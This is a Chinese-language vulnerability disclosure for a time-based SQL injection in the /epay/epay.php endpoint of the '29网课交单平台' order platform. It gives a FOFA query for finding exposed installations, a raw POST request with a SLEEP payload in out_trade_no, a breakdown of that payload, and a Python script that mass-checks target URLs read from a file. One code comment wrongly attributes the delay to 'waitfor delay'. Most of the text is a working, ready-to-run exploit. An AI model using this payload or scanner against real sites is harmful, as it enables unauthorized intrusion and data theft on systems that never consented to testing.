声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
漏洞描述
29网课交单平台,其 /epay/epay.php
接口处存在SQL注入漏洞。
漏洞复现
1)信息收集
fofa:body="你在看什么呢?我写的代码好看吗"
纵然变化,依然故我。
2)构造数据包
POST /epay/epay.php HTTP/1.1
Host:ip
Content-Type: application/x-www-form-urlencoded
out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
这段代码是SQL注入攻击中的一部分,其主要目的是尝试延缓数据库的响应时间,以此来验证某个条件或判断是否存在SQL注入的漏洞。下面是对这段代码的逐部分解析:
-
out_trade_no=' AND
:这通常是在一个SQL查询中的一个条件语句的开始,例如在更新或选择数据时,你可能会看到这样的结构。正常情况下,out_trade_no
应该是一个具体的值,但在这里被修改了。 -
(SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA)
:这部分是“延时注入”技巧。SLEEP(5)
会让数据库暂停执行5秒。外面的SELECT 8078
和内层的SELECT(SLEEP(5))
都是为了构造一个有效的SQL查询语句,让数据库能够执行这个延时操作。eEcA
是随机生成的表名,实际上并不存在,但在某些数据库中,你可以从不存在的表中选择,只要选择的列(8078
)也不存在,查询就会成功执行,而不会抛出错误。 -
AND 'aEmC'='aEmC
:这部分是一个恒真的条件(总是为真),用于闭合前面的逻辑条件。它的作用是为了确保整个SQL语句在语法上是完整的,并且可以被数据库引擎正确解析和执行。
整体来看,如果数据库服务器对这个请求的响应时间显著增加(比如超过5秒),那么就可以推断出存在SQL注入的可能,因为只有当特定的条件(如out_trade_no
的部分)被满足时,才会触发SLEEP(5)
导致的延迟。
响应时间长达5秒,sql注入存在。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import http.client # 导入处理HTTP请求的模块
import ssl # 导入SSL支持模块
import argparse # 导入命令行参数解析模块
from urllib.parse import urlparse # 导入URL解析模块
import time # 导入时间处理模块
# 定义控制台输出颜色代码
RED = '\033[91m' # 红色
RESET = '\033[0m' # 重置颜色
def check_vulnerability(url):
"""
检查给定URL是否存在特定的SQL注入漏洞。
"""
try:
# 解析URL,获取域名和协议
parsed_url = urlparse(url)
# 设置请求的路径和数据体
path = "/epay/epay.php" # 要请求的路径
# 构造POST请求的数据体,包含潜在的SQL注入payload
body = "out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(3)))eEcA) AND 'aEmC'='aEmC"
headers = {
"Content-Type": "application/x-www-form-urlencoded", # 设置Content-Type头
"User-Agent": "Mozilla/5.0" # 设置User-Agent头
}
# 根据URL的协议创建连接对象,如果是HTTPS则忽略证书验证
conn = http.client.HTTPSConnection(parsed_url.netloc, context=ssl._create_unverified_context()) if parsed_url.scheme == "https" else http.client.HTTPConnection(parsed_url.netloc)
# 记录开始时间
start_time = time.time()
# 发送POST请求
conn.request("POST", path, body=body, headers=headers)
# 获取服务器响应
response = conn.getresponse()
# 计算请求耗时
elapsed_time = time.time() - start_time
# 如果响应时间在3到5秒之间,可能表明存在SQL注入漏洞(因为waitfor delay '0:0:3'会延迟响应)
if 3 <= elapsed_time <= 5:
print(f"{RED}URL [{url}] 可能存在29网课交单平台 epay.php SQL注入漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
except Exception as e:
# 如果请求失败,打印错误信息
print(f"URL [{url}] 请求失败: {e}")
def main():
"""
主函数,解析命令行参数并调用漏洞检查函数。
"""
# 创建命令行参数解析器
parser = argparse.ArgumentParser(description='检测目标地址是否存在29网课交单平台 epay.php SQL注入漏洞')
# 添加命令行参数选项
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
# 解析命令行参数
args = parser.parse_args()
# 如果指定了单个URL,进行漏洞检查
if args.url:
# 确保URL格式正确
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
# 如果指定了包含多个URL的文件,逐个读取并进行漏洞检查
elif args.file:
with open(args.file, 'r') as file:
urls = file.read().splitlines() # 读取所有行并去除换行符
for url in urls:
# 确保URL格式正确
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
# 当作为主程序运行时,调用main函数
if __name__ == '__main__':
main()
运行截图